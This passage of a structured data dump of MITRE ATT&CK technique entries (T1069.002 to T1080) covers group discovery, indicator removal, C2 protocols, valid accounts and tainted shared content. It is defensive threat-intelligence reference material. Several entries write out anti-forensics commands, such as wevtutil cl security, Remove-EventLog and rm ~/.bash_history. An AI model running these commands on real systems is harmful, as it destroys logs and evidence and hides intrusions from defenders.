                              'knowledge of local system permission groups can help adversaries determine which groups '
                              'exist and which users belong to a particular group. Adversaries may use this '
                              'information to determine which users have elevated permissions, such as the users found '
                              'within the local administrators group.\n'
                              '\n'
                              'Commands such as <code>net localgroup</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list '
                              '/Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.',
               'name': 'Local Groups',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1069.002': {'attack_id': 'T1069.002',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find domain-level groups and permission settings. The '
                              'knowledge of domain-level permission groups can help adversaries determine which groups '
                              'exist and which users belong to a particular group. Adversaries may use this '
                              'information to determine which users have elevated permissions, such as domain '
                              'administrators.\n'
                              '\n'
                              'Commands such as <code>net group /domain</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q '
                              'group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level '
                              'groups.',
               'name': 'Domain Groups',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1069.003': {'attack_id': 'T1069.003',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find cloud groups and permission settings. The knowledge of '
                              'cloud permission groups can help adversaries determine the particular roles of users '
                              'and groups within an environment, as well as which users are associated with a '
                              'particular group.\n'
                              '\n'
                              'With authenticated access there are several tools that can be used to find permissions '
                              'groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and '
                              'permissions groups for Exchange and Office 365 accounts (Citation: Microsoft '
                              'Msolrole)(Citation: GitHub Raindance).\n'
                              '\n'
                              'Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces '
                              'to obtain permissions groups. The command <code>az ad user get-member-groups</code> '
                              'will list groups associated to a user account for Azure while the API endpoint '
                              '<code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources '
                              'available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red '
                              'Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, '
                              'the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate '
                              'the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute '
                              'Credentials 2022)\n'
                              '\n'
                              'Adversaries may attempt to list ACLs for objects to determine the owner and other '
                              'accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> '
                              'API (Citation: AWS Get Bucket ACL). Using this information an adversary can target '
                              'accounts with permissions to a given object or leverage accounts they have already '
                              'compromised to access the object.',
               'name': 'Cloud Groups',
               'platforms': ['Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Google Workspace']},
 'T1070': {'attack_id': 'T1070',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may delete or modify artifacts generated within systems to remove evidence of '
                          'their presence or hinder defenses. Various artifacts may be created by an adversary or '
                          'something that can be attributed to an adversary’s actions. Typically these artifacts are '
                          'used as defensive indicators related to monitored events, such as strings from downloaded '
                          'files, logs that are generated from user actions, and other data analyzed by defenders. '
                          'Location, format, and type of artifact (such as command or login history) are often '
                          'specific to each platform.\n'
                          '\n'
                          'Removal of these indicators may interfere with event collection, reporting, or other '
                          'processes used to detect intrusion activity. This may compromise the integrity of security '
                          'solutions by causing notable events to go unreported. This activity may also impede '
                          'forensic analysis and incident response, due to lack of sufficient data to determine what '
                          'occurred.',
           'name': 'Indicator Removal',
           'platforms': ['Linux', 'macOS', 'Windows', 'Containers', 'Network', 'Office 365', 'Google Workspace']},
 'T1070.001': {'attack_id': 'T1070.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows '
                              "Event Logs are a record of a computer's alerts and notifications. There are three "
                              'system-defined sources of events: System, Application, and Security, with five event '
                              'types: Error, Warning, Information, Success Audit, and Failure Audit.\n'
                              '\n'
                              '\n'
                              'With administrator privileges, the event logs can be cleared with the following utility '
                              'commands:\n'
                              '\n'
                              '* <code>wevtutil cl system</code>\n'
                              '* <code>wevtutil cl application</code>\n'
                              '* <code>wevtutil cl security</code>\n'
                              '\n'
                              'These logs may also be cleared through other mechanisms, such as the event viewer GUI '
                              'or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, '
                              'adversaries may use the PowerShell command <code>Remove-EventLog -LogName '
                              'Security</code> to delete the Security EventLog and after reboot, disable future '
                              'logging.  Note: events may still be generated and logged in the .evtx file between the '
                              'time the command is run and the reboot.(Citation: disable_win_evt_logging)\n'
                              '\n'
                              'Adversaries may also attempt to clear logs by directly deleting the stored log files '
                              'within `C:\\Windows\\System32\\winevt\\logs\\`.',
               'name': 'Clear Windows Event Logs',
               'platforms': ['Windows']},
 'T1070.002': {'attack_id': 'T1070.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux '
                              'both keep track of system or user-initiated actions via system logs. The majority of '
                              'native system logging is stored under the <code>/var/log/</code> directory. Subfolders '
                              'in this directory categorize logs by their related functions, such as:(Citation: Linux '
                              'Logs)\n'
                              '\n'
                              '* <code>/var/log/messages:</code>: General and system-related messages\n'
                              '* <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs\n'
                              '* <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records\n'
                              '* <code>/var/log/kern.log</code>: Kernel logs\n'
                              '* <code>/var/log/cron.log</code>: Crond logs\n'
                              '* <code>/var/log/maillog</code>: Mail server logs\n'
                              '* <code>/var/log/httpd/</code>: Web server access and error logs\n',
               'name': 'Clear Linux or Mac System Logs',
               'platforms': ['Linux', 'macOS']},
 'T1070.003': {'attack_id': 'T1070.003',
               'categories': ['defense-evasion'],
               'description': 'In addition to clearing system logs, an adversary may clear the command history of a '
                              'compromised account to conceal the actions undertaken during an intrusion. Various '
                              'command interpreters keep track of the commands users type in their terminal so that '
                              "users can retrace what they've done.\n"
                              '\n'
                              'On Linux and macOS, these command histories can be accessed in a few different ways. '
                              'While logged in, this command history is tracked in a file pointed to by the '
                              'environment variable <code>HISTFILE</code>. When a user logs off a system, this '
                              "information is flushed to a file in the user's home directory called "
                              '<code>~/.bash_history</code>. The benefit of this is that it allows users to go back to '
                              "commands they've used before in different sessions.\n"
                              '\n'
                              'Adversaries may delete their commands from these logs by manually clearing the history '
                              '(<code>history -c</code>) or deleting the bash history file <code>rm '
                              '~/.bash_history</code>.  \n'
                              '\n'
                              'Adversaries may also leverage a [Network Device '
                              'CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command '
                              'history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: '
                              'US-CERT-TA18-106A)\n'
                              '\n'
                              'On Windows hosts, PowerShell has two different command history providers: the built-in '
                              'history and the command history managed by the <code>PSReadLine</code> module. The '
                              'built-in history only tracks the commands used in the current session. This command '
                              'history is not available to other sessions and is deleted when the session ends.\n'
                              '\n'
                              'The <code>PSReadLine</code> command history tracks the commands used in all PowerShell '
                              'sessions and writes them to a file '
                              '(<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> '
                              'by default). This history file is available to all sessions and contains all past '
                              'history since the file is not deleted when the session ends.(Citation: Microsoft '
                              'PowerShell Command History)\n'
                              '\n'
                              'Adversaries may run the PowerShell command <code>Clear-History</code> to flush the '
                              'entire command history from a current PowerShell session. This, however, will not '
                              'delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete '
                              'the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell '
                              'commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos '
                              'PowerShell Command History Forensics)',
               'name': 'Clear Command History',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1070.004': {'attack_id': 'T1070.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may delete files left behind by the actions of their intrusion activity. '
                              'Malware, tools, or other non-native files dropped or created on a system by an '
                              'adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may '
                              'leave traces to indicate to what was done within a network and how. Removal of these '
                              'files can occur during an intrusion, or as part of a post-intrusion process to minimize '
                              "the adversary's footprint.\n"
                              '\n'
                              'There are tools available from the host operating system to perform cleanup, but '
                              'adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) '
                              'Examples of built-in [Command and Scripting '
                              'Interpreter](https://attack.mitre.org/techniques/T1059) functions include '
                              '<code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and '
                              'macOS.',
               'name': 'File Deletion',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1070.005': {'attack_id': 'T1070.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may remove share connections that are no longer useful in order to clean up '
                              'traces of their operation. Windows shared drive and [SMB/Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when '
                              'no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility '
                              'that can be used to remove network share connections with the <code>net use '
                              '\\\\system\\share /delete</code> command. (Citation: Technet Net Use)',
               'name': 'Network Share Connection Removal',
               'platforms': ['Windows']},
 'T1070.006': {'attack_id': 'T1070.006',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file time attributes to hide new or changes to existing files. '
                              'Timestomping is a technique that modifies the timestamps of a file (the modify, access, '
                              'create, and change times), often to mimic files that are in the same folder. This is '
                              'done, for example, on files that have been modified or created by the adversary so that '
                              'they do not appear conspicuous to forensic investigators or file analysis tools.\n'
                              '\n'
                              'Timestomping may be used along with file name '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and '
                              'tools.(Citation: WindowsIR Anti-Forensic Techniques)',
               'name': 'Timestomp',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1070.007': {'attack_id': 'T1070.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear or remove evidence of malicious network connections in order to '
                              'clean up traces of their operations. Configuration settings as well as various '
                              'artifacts that highlight connection history may be created on a system and/or in '
                              'application logs from behaviors that require network connections, such as [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021) or [External Remote '
                              'Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts '
                              'to monitor or otherwise analyze network connections created by adversaries.\n'
                              '\n'
                              'Network connection history may be stored in various locations. For example, RDP '
                              'connection history may be stored in Windows Registry values under (Citation: Microsoft '
                              'RDP Removal):\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default</code>\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers</code>\n'
                              '\n'
                              'Windows may also store information about recent RDP connections in files such as '
                              '<code>C:\\Users\\\\%username%\\Documents\\Default.rdp</code> and '
                              '`C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\n'
                              'Server Client\\Cache\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may '
                              'store information highlighting connection history in system logs (such as those stored '
                              'in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: '
                              'FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen '
                              'Sharing)\n'
                              '\n'
                              'Malicious network connections may also require changes to third-party applications or '
                              'network configuration settings, such as [Disable or Modify System '
                              'Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable '
                              '[Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify '
                              'this data to conceal indicators and/or impede defensive analysis.',
               'name': 'Clear Network Connection History and Configurations',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1070.008': {'attack_id': 'T1070.008',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify mail and mail application data to remove evidence of their '
                              'activity. Email applications allow users and other programs to export and delete '
                              'mailbox data via command line tools or use of APIs. Mail application data can be '
                              'emails, email metadata, or logs generated by the application or operating system, such '
                              'as export requests. \n'
                              '\n'
                              'Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and '
                              'metadata, such as evidence of '
                              '[Phishing](https://attack.mitre.org/techniques/T1566)/[Internal '
                              'Spearphishing](https://attack.mitre.org/techniques/T1534), [Email '
                              'Collection](https://attack.mitre.org/techniques/T1114), [Mail '
                              'Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or '
                              'email-based exfiltration such as [Exfiltration Over Alternative '
                              'Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence '
                              'on Exchange servers adversaries have used the <code>ExchangePowerShell</code> '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including '
                              '<code>Remove-MailboxExportRequest</code> to remove evidence of mailbox '
                              'exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux '
                              'and macOS, adversaries may also delete emails through a command line utility called '
                              '<code>mail</code>  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) '
                              'to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx '
                              'man page)\n'
                              '\n'
                              'Adversaries may also remove emails and metadata/headers indicative of spam or '
                              'suspicious activity (for example, through the use of organization-wide transport rules) '
                              'to reduce the likelihood of malicious emails being detected by security '
                              'products.(Citation: Microsoft OAuth Spam 2022)',
               'name': 'Clear Mailbox Data',
               'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Google Workspace']},
 'T1070.009': {'attack_id': 'T1070.009',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may clear artifacts associated with previously established persistence on a '
                              'host system to remove evidence of their activity. This may involve various actions, '
                              'such as removing services, deleting executables, [Modify '
                              'Registry](https://attack.mitre.org/techniques/T1112), [Plist File '
                              'Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup '
                              'to prevent defenders from collecting evidence of their persistent presence.(Citation: '
                              'Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain '
                              'persistence (i.e. [Create '
                              'Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack '
                              '2022)\n'
                              '\n'
                              'In some instances, artifacts of persistence may also be removed once an adversary’s '
                              'persistence is executed in order to prevent errors with the new instance of the '
                              'malware.(Citation: NCC Group Team9 June 2020)',
               'name': 'Clear Persistence',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1071': {'attack_id': 'T1071',
           'categories': ['command-and-control'],
           'description': 'Adversaries may communicate using OSI application layer protocols to avoid '
                          'detection/network filtering by blending in with existing traffic. Commands to the remote '
                          'system, and often the results of those commands, will be embedded within the protocol '
                          'traffic between the client and server. \n'
                          '\n'
                          'Adversaries may utilize many different protocols, including those used for web browsing, '
                          'transferring files, electronic mail, or DNS. For connections that occur internally within '
                          'an enclave (such as those between a proxy or pivot node and other nodes), commonly used '
                          'protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) ',
           'name': 'Application Layer Protocol',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1071.001': {'attack_id': 'T1071.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with web '
                              'traffic to avoid detection/network filtering by blending in with existing traffic. '
                              'Commands to the remote system, and often the results of those commands, will be '
                              'embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: '
                              'Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S '
                              'packets have many fields and headers in which data can be concealed. An adversary may '
                              'abuse these protocols to communicate with systems under their control within a victim '
                              'network while also mimicking normal, expected traffic. ',
               'name': 'Web Protocols',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1071.002': {'attack_id': 'T1071.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with '
                              'transferring files to avoid detection/network filtering by blending in with existing '
                              'traffic. Commands to the remote system, and often the results of those commands, will '
                              'be embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July '
                              '2019), FTPS, and TFTP that transfer files may be very common in environments.  Packets '
                              'produced from these protocols may have many fields and headers in which data can be '
                              'concealed. Data could also be concealed within the transferred files. An adversary may '
                              'abuse these protocols to communicate with systems under their control within a victim '
                              'network while also mimicking normal, expected traffic. ',
               'name': 'File Transfer Protocols',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1071.003': {'attack_id': 'T1071.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using application layer protocols associated with '
                              'electronic mail delivery to avoid detection/network filtering by blending in with '
                              'existing traffic. Commands to the remote system, and often the results of those '
                              'commands, will be embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very '
                              'common in environments.  Packets produced from these protocols may have many fields and '
                              'headers in which data can be concealed. Data could also be concealed within the email '
                              'messages themselves. An adversary may abuse these protocols to communicate with systems '
                              'under their control within a victim network while also mimicking normal, expected '
                              'traffic.(Citation: FireEye APT28) ',
               'name': 'Mail Protocols',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1071.004': {'attack_id': 'T1071.004',
               'categories': ['command-and-control'],
               'description': 'Adversaries may communicate using the Domain Name System (DNS) application layer '
                              'protocol to avoid detection/network filtering by blending in with existing traffic. '
                              'Commands to the remote system, and often the results of those commands, will be '
                              'embedded within the protocol traffic between the client and server. \n'
                              '\n'
                              'The DNS protocol serves an administrative function in computer networking and thus may '
                              'be very common in environments. DNS traffic may also be allowed even before network '
                              'authentication is completed. DNS packets contain many fields and headers in which data '
                              'can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to '
                              'communicate with systems under their control within a victim network while also '
                              'mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium '
                              'DnsTunneling) ',
               'name': 'DNS',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1072': {'attack_id': 'T1072',
           'categories': ['execution', 'lateral-movement'],
           'description': 'Adversaries may gain access to and use centralized software suites installed within an '
                          'enterprise to execute commands and move laterally through the network. Configuration '
                          'management and software deployment applications may be used in an enterprise network or '
                          'cloud environment for routine administration purposes. These systems may also be integrated '
                          'into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems '
                          'Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.  \n'
                          '\n'
                          'Access to network-wide or enterprise-wide endpoint management software may enable an '
                          'adversary to achieve remote code execution on all connected systems. The access may be used '
                          'to laterally move to other systems, gather information, or cause a specific effect, such as '
                          'wiping the hard drives on all endpoints.\n'
                          '\n'
                          'SaaS-based configuration management services may allow for broad [Cloud Administration '
                          'Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as '
                          'the execution of arbitrary commands on on-premises endpoints. For example, Microsoft '
                          'Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on '
                          'on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to '
                          'On-Prem AD 2020) Such services may also utilize [Web '
                          'Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary '
                          'owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access '
                          'Trojan)\n'
                          '\n'
                          'Network infrastructure devices may also have configuration management tools that can be '
                          'similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by '
                          'Suspected Chinese Actor in Espionage Operation)\n'
                          '\n'
                          'The permissions required for this action vary by system configuration; local credentials '
                          'may be sufficient with direct access to the third-party system, or specific domain '
                          'credentials may be required. However, the system may require an administrative account to '
                          'log in or to access specific functionality.',
           'name': 'Software Deployment Tools',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network', 'SaaS']},
 'T1074': {'attack_id': 'T1074',
           'categories': ['collection'],
           'description': 'Adversaries may stage collected data in a central location or directory prior to '
                          'Exfiltration. Data may be kept in separate files or combined into one file through '
                          'techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). '
                          'Interactive command shells may be used, and common functionality within '
                          '[cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a '
                          'staging location.(Citation: PWC Cloud Hopper April 2017)\n'
                          '\n'
                          'In cloud environments, adversaries may stage data within a particular instance or virtual '
                          'machine before exfiltration. An adversary may [Create Cloud '
                          'Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that '
                          'instance.(Citation: Mandiant M-Trends 2020)\n'
                          '\n'
                          'Adversaries may choose to stage data from a victim network in a centralized location prior '
                          'to Exfiltration to minimize the number of connections made to their C2 server and better '
                          'evade detection.',
           'name': 'Data Staged',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1074.001': {'attack_id': 'T1074.001',
               'categories': ['collection'],
               'description': 'Adversaries may stage collected data in a central location or directory on the local '
                              'system prior to Exfiltration. Data may be kept in separate files or combined into one '
                              'file through techniques such as [Archive Collected '
                              'Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be '
                              'used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) '
                              'and bash may be used to copy data into a staging location.\n'
                              '\n'
                              'Adversaries may also stage collected data in various available formats/locations of a '
                              'system, including local storage databases/repositories or the Windows '
                              'Registry.(Citation: Prevailion DarkWatchman 2021)',
               'name': 'Local Data Staging',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1074.002': {'attack_id': 'T1074.002',
               'categories': ['collection'],
               'description': 'Adversaries may stage data collected from multiple systems in a central location or '
                              'directory on one system prior to Exfiltration. Data may be kept in separate files or '
                              'combined into one file through techniques such as [Archive Collected '
                              'Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be '
                              'used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) '
                              'and bash may be used to copy data into a staging location.\n'
                              '\n'
                              'In cloud environments, adversaries may stage data within a particular instance or '
                              'virtual machine before exfiltration. An adversary may [Create Cloud '
                              'Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that '
                              'instance.(Citation: Mandiant M-Trends 2020)\n'
                              '\n'
                              'By staging data on one system prior to Exfiltration, adversaries can minimize the '
                              'number of connections made to their C2 server and better evade detection.',
               'name': 'Remote Data Staging',
               'platforms': ['Windows', 'IaaS', 'Linux', 'macOS']},
 'T1078': {'attack_id': 'T1078',
           'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
           'description': 'Adversaries may obtain and abuse credentials of existing accounts as a means of gaining '
                          'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised '
                          'credentials may be used to bypass access controls placed on various resources on systems '
                          'within the network and may even be used for persistent access to remote systems and '
                          'externally available services, such as VPNs, Outlook Web Access, network devices, and '
                          'remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant '
                          'an adversary increased privilege to specific systems or access to restricted areas of the '
                          'network. Adversaries may choose not to use malware or tools in conjunction with the '
                          'legitimate access those credentials provide to make it harder to detect their presence.\n'
                          '\n'
                          'In some cases, adversaries may abuse inactive accounts: for example, those belonging to '
                          'individuals who are no longer part of an organization. Using these accounts may allow the '
                          'adversary to evade detection, as the original account user will not be present to identify '
                          'any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n'
                          '\n'
                          'The overlap of permissions for local, domain, and cloud accounts across a network of '
                          'systems is of concern because the adversary may be able to pivot across accounts and '
                          'systems to reach a high level of access (i.e., domain or enterprise administrator) to '
                          'bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)',
           'name': 'Valid Accounts',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers',
                         'Network']},
 'T1078.001': {'attack_id': 'T1078.001',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a default account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts '
                              'are those that are built-into an OS, such as the Guest or Administrator accounts on '
                              'Windows systems. Default accounts also include default factory/provider set accounts on '
                              'other types of systems, software, or devices, including the root user account in AWS '
                              'and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb '
                              '2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n'
                              '\n'
                              'Default accounts are not limited to client machines, rather also include accounts that '
                              'are preset for equipment such as network devices and computer applications whether they '
                              'are internal, open source, or commercial. Appliances that come preset with a username '
                              'and password combination pose a serious threat to organizations that do not change it '
                              'post installation, as they are easy targets for an adversary. Similarly, adversaries '
                              'may also utilize publicly disclosed or stolen [Private '
                              'Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to '
                              'legitimately connect to remote environments via [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)',
               'name': 'Default Accounts',
               'platforms': ['Windows',
                             'Azure AD',
                             'Office 365',
                             'SaaS',
                             'IaaS',
                             'Linux',
                             'macOS',
                             'Google Workspace',
                             'Containers',
                             'Network']},
 'T1078.002': {'attack_id': 'T1078.002',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a domain account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: '
                              'TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain '
                              'Services where access and permissions are configured across systems and services that '
                              'are part of that domain. Domain accounts can cover users, administrators, and '
                              'services.(Citation: Microsoft AD Accounts)\n'
                              '\n'
                              'Adversaries may compromise domain accounts, some with a high level of privileges, '
                              'through various means such as [OS Credential '
                              'Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access '
                              'to privileged resources of the domain.',
               'name': 'Domain Accounts',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1078.003': {'attack_id': 'T1078.003',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a local account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts '
                              'are those configured by an organization for use by users, remote support, services, or '
                              'for administration on a single system or service.\n'
                              '\n'
                              'Local Accounts may also be abused to elevate privileges and harvest credentials through '
                              '[OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may '
                              'allow the abuse of local accounts across a set of machines on a network for the '
                              'purposes of Privilege Escalation and Lateral Movement. ',
               'name': 'Local Accounts',
               'platforms': ['Linux', 'macOS', 'Windows', 'Containers', 'Network']},
 'T1078.004': {'attack_id': 'T1078.004',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Valid accounts in cloud environments may allow adversaries to perform actions to '
                              'achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud '
                              'accounts are those created and configured by an organization for use by users, remote '
                              'support, services, or for administration of resources within a cloud service provider '
                              'or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they '
                              'may be hybrid-joined between on-premises systems and the cloud through syncing or '
                              'federation with other identity sources such as Windows Active Directory. (Citation: AWS '
                              'Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD '
                              'Federation)\n'
                              '\n'
                              'Service or user accounts may be targeted by adversaries through [Brute '
                              'Force](https://attack.mitre.org/techniques/T1110), '
                              '[Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain '
                              'access to the environment. Federated or synced accounts may be a pathway for the '
                              'adversary to affect both on-premises systems and cloud environments - for example, by '
                              'leveraging shared credentials to log onto [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, '
                              'whether federated, synced, or cloud-only, may also allow pivoting to on-premises '
                              'environments by leveraging SaaS-based [Software Deployment '
                              'Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined '
                              'devices.\n'
                              '\n'
                              'An adversary may create long lasting [Additional Cloud '
                              'Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud '
                              'account to maintain persistence in the environment. Such credentials may also be used '
                              'to bypass security controls such as multi-factor authentication. \n'
                              '\n'
                              'Cloud accounts may also be able to assume [Temporary Elevated Cloud '
                              'Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through '
                              'various means within the environment. Misconfigurations in role assignments or role '
                              'assumption policies may allow an adversary to use these mechanisms to leverage '
                              'permissions outside the intended scope of the account. Such over privileged accounts '
                              'may be used to harvest sensitive data from online storage accounts and databases '
                              'through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. \n',
               'name': 'Cloud Accounts',
               'platforms': ['Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Google Workspace']},
 'T1080': {'attack_id': 'T1080',
           'categories': ['lateral-movement'],
           'description': '\n'
                          'Adversaries may deliver payloads to remote systems by adding content to shared storage '
                          'locations, such as network drives or internal code repositories. Content stored on network '
                          'drives or in other shared locations may be tainted by adding malicious programs, scripts, '
                          'or exploit code to otherwise valid files. Once a user opens the shared tainted content, the '
                          "malicious portion can be executed to run the adversary's code on a remote system. "
                          'Adversaries may use tainted shared content to move laterally.\n'
                          '\n'
                          'A directory share pivot is a variation on this technique that uses several other techniques '
                          'to propagate malware when users access a shared network directory. It uses [Shortcut '
                          'Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that '
                          'use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real '
                          'directories, which are hidden through [Hidden Files and '
                          'Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based '
                          'directories have an embedded command that executes the hidden malware file in the directory '
                          "and then opens the real intended directory so that the user's expected action still occurs. "
                          'When used with frequently used network directories, the technique may result in frequent '
